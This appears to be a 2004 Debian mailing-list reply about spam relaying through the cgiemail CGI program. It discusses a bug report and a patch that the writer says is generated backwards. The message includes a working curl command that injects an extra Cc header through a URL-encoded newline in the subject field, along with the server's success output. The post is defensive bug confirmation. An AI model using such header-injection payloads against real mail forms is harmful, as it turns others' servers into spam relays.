On Fri, Jan 23, 2004 at 01:12:48PM +0200, Ian Forbes wrote:

> I discovered this morning that our web server has been exploited for the 
> relaying of spam. It has the latest "cgiemail" program distributed with 
> Debian installed on it.
> 
> First thing I did was disable the cgiemail executable to stop the flow 
> of spam. 
> 
> Then I did some research. This is not a totally new scenario. After a 
> little web searching I have found:
> 
> 1) An open bug report:
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=222870

In that bug report, the maintainer claims that the bug is not reproducible
with cgiemail 1.6, but it seems to work for me:

mizar:[~] curl -d '[EMAIL PROTECTED]&subject=foobar%0aCc:[EMAIL PROTECTED]' 
http://sikuani.its.monash.edu.au/cgi-bin/cgiemail/template/test
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>The following email message was sent.<P><HR><PRE>
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: foobar
Cc: [EMAIL PROTECTED]

What is your name?              
What is your quest?             
What is your favourite colour?  
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

> 3) A patch which might fix the problem
> http://www.securityfocus.com/archive/1/340174

That patch is both in "normal" diff format, which makes it difficult to use and
read, and also seems to have been generated backwards, removing lines when it
should be adding them.  I cannot judge its correctness, either, though the
description of the solution seems valid.

-- 
 - mdz


Reply via email to